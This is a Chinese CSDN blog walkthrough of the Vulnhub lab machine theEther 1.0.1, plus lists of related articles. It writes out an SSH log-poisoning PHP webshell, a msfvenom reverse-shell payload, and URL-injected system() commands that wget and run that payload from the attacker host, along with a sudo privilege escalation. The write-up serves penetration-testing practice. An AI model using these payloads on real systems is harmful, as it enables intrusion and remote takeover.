theEther_1.0.1靶机

于 2024-08-04 23:30:00 发布
阅读量153 收藏 2
点赞数 2
文章标签: 网络安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65285254/article/details/140910328
版权

主机发现

全端口扫描

访问80端口

目录扫描

发现下在点击上面的ABOUT US之后,url里有着请求参数:/index.php?file=about.php

对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破

发送到 intruder模块

添加可以存在文件包含的日志文件

发现有一个/var/log/auth.log有日志记录,并且是ssh的记录

可以尝试利用ssh写入一句话木马

ssh "<?php @system($_GET[cmd]);?>"@192.168.153.136

访问,尝试执行命令

使用msfvenom

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.153.133 LPORT=1234 -f elf > shell.elf

msf监听

在浏览器url中ip地址后拼接以下内容

/?file=/var/log/auth.log&d1no=system('wget+192.168.153.133:8000/shell.elf')%3b

/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b

/?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

获取shell

将获取到的shell转变为交互式的shell:python -c 'import pty;pty.spawn("/bin/bash")'

sudo提权 sudo -l

发现xxxlogauditorxxx.py 脚本

运行该脚本

sudo ./xxxlogauditorxxx.py

将会获得root权限 /var/log/auth.log | id

m0_65285254
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Redhat 7.6安装GaussDB_100_1.0.1详细攻略
weixin_41365682的博客
05-22 851
Redhat 7.6安装GaussDB_100_1.0.1详细步骤及白名单和开机自启动配置,数据库用户创建及远程登陆
LordOfTheRoot_1.0.1靶机入侵
RestoreJustice的博客
03-15 312
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。下载地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.138。Linux系统中使用.so后缀的,sqlmap中的这两个文件经过了编码,不能直接使用。这里用的是msf里面的。
BOB_1.0.1靶机详解
weixin_44681307的博客
07-29 349
然后我们在elliot的家目录发现一个txt文件,打开后发现里面有他的密码,也有James用户的密码。找到ip地址后对IP进行一个单独的扫描,发现ssh端口被改到25468了,等会儿登陆时候需要用到。但是关键词被过滤了,我们在ls中级加两个反斜线就发现可以使用ls命令,下面信息有反馈。然后make一下.c文件,这样就出来一个可执行文件,执行后就拿到了root权限。其实几个用户都是一样的,这个靶机并没有什么能利用的点,但是内核漏洞可以利用。wget过来,file一下发现是一个zip文件,我们解压一下。
vulnhub靶场之 LordOfTheRoot_1.0.1
wanan的博客
10-09 990
vulnhub靶场之 LordOfTheRoot_1.0.1
LordOfTheRoot_1.0.1靶机学习笔记
weixin_50791426的博客
12-14 118
vulnhub靶场内核提权
VulnHub-Lord Of The Root_1.0.1-靶机渗透学习
嗯嗯呐的博客
11-17 751
靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 靶机难度:中等(CTF) 靶机描述:这是KoocSec为黑客练习准备的另一个Boot2Root挑战。他通过OSCP考试的启发准备了这一过程。它基于伟大的小说改制电影《指环王》的概念。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 一、信息采集 nmap扫描确定靶机IP地址 扫描靶机对外开放端口,开始信息采集 只扫描出22端口 连接22端口获得提示 knock f
Bob_v1.0.1靶机
zdd1453691081的博客
08-03 369
【代码】Bob_v1.0.1靶机
Vulnhub靶机:JANGOW_ 1.0.1
LainWith的博客
10-06 1137
Jangow(此系列共1台)发布日期:2021年11月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1。
GaussDB_100_1.0.1部署安装
刘元林的博客
05-08 1471
如果ENABLE_SYSDBA_LOGIN=TRUE,可以免密登录:zsql / as sysdba。zsql sys/Changeme_123@你的IP:1888。# 安装成功后,会自动注册环境变量。# 安装成功后,会自动启动数据库。如下提示,则表示安装成功。
Bob_v1.0.1靶机渗透测试
最新发布
weixin_58786230的博客
08-03 170
【代码】Bob_v1.0.1靶机渗透测试。
GaussDB_100_1.0.1-DATABASE-REDHAT-64bit.tar.gz
04-14
本篇文章将详细阐述如何在Red Hat Enterprise Linux 64位环境下安装GaussDB 100的1.0.1版本,以及在单机部署中的关键步骤,这些都是基于大量实践和实验的总结。 首先,我们需要准备的是名为"GaussDB_100_1.0.1-...
TrollInstallerX_1.0.1_秋名山.ipa
04-08
TrollInstallerX_1.0.1_秋名山.ipa
网件 NETGEAR R6800 固件 V1.1.0.42_1.0.1(多国语言版)
04-03
- 如果遇到问题,可查阅官方提供的“Release Notes”(R6800-V1.1.0.42_1.0.1_Release_Notes.html)文件,了解详细变更日志和升级指南。 总的来说,网件(NETGEAR)R6800固件V1.1.0.42_1.0.1的更新旨在提高设备的...
网件 NETGEAR R6800 固件 V1.2.0.90_1.0.1
04-03
网件 NETGEAR R6800 固件 V1.2.0.90_1.0.1 安全补丁: 修复安全漏洞。
GaussDB_100_1.0.1-DATABASE-EULER20SP8-64bit.tar.gz
04-23
GaussDB_100_1.0.1-DATABASE-EULER20SP8-64bit.tar.gz 这个压缩包文件,显然是华为云数据库产品GaussDB的一个特定版本。GaussDB是华为自主研发的分布式数据库系统,它在设计上融合了最新的数据库技术和华为多年的...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1748
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
读零信任网络:在不可信网络中构建安全系统07设备信任
lyingSeven的博客
08-03 610
设备安全
数理方法习题 前六章.pdf
08-03
数理方法习题 前六章
filezilla_server_1.0.1设置
08-08
FileZilla Server 1.0.1 是一个功能强大的FTP服务器软件,用于在计算机或服务器上搭建FTP服务器。以下是关于如何设置FileZilla Server 1.0.1的说明: 1. 下载并安装:首先,从官方网站上下载FileZilla Server 1.0.1的安装程序。然后,运行安装程序并按照提示完成安装过程。 2. 启动软件:安装完成后,启动FileZilla Server 1.0.1。在启动界面上,你会看到"Welcome to the FileZilla Server Installation Wizard"(欢迎使用FileZilla Server安装向导)。 3. 创建管理员帐户:首次运行软件时,你需要创建一个管理员帐户。点击"Next"(下一步),然后在"Server Configuration"(服务器配置)界面上选择"Create a new user called 'admin'"(创建名为 'admin' 的新用户),并输入相应的密码。点击"Next"(下一步)完成管理员帐户的创建。 4. 配置FTP服务器:在"Server Configuration"(服务器配置)界面上,你可以设置FTP服务器的端口、传输模式、加密选项等。根据你的需求进行相应的配置,并点击"Next"(下一步)。 5. 选择默认共享文件夹:在"Shared Folders"(共享文件夹)界面上,你可以选择默认的共享文件夹。你可以点击"Add"(添加)按钮添加需要共享的文件夹,并为每个文件夹指定相应的权限。点击"Next"(下一步)。 6. 配置访问权限:在"User Settings"(用户设置)界面上,你可以为各个用户定义不同的访问权限。点击"Add"(添加)按钮,输入相应的用户名和密码,并为其选择或创建所需的目录权限。点击"Next"(下一步)。 7. 完成设置:在"Groups"(组)界面上,你可以创建用户组,并将用户分配到相应的组中。然后,点击"Next"(下一步)。 8. 确认设置:在"Confirmation"(确认)界面上,你可以查看并确认所做的设置。如果一切都正确,点击"Install"(安装)按钮开始安装。 9. 完成安装:安装完成后,点击"Done"(完成)按钮退出安装向导。你的FTP服务器已经成功设置和安装。 请注意,以上只是基本设置过程的概述。根据你的具体需求,你还可以进一步配置和调整FileZilla Server 1.0.1以满足你的要求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值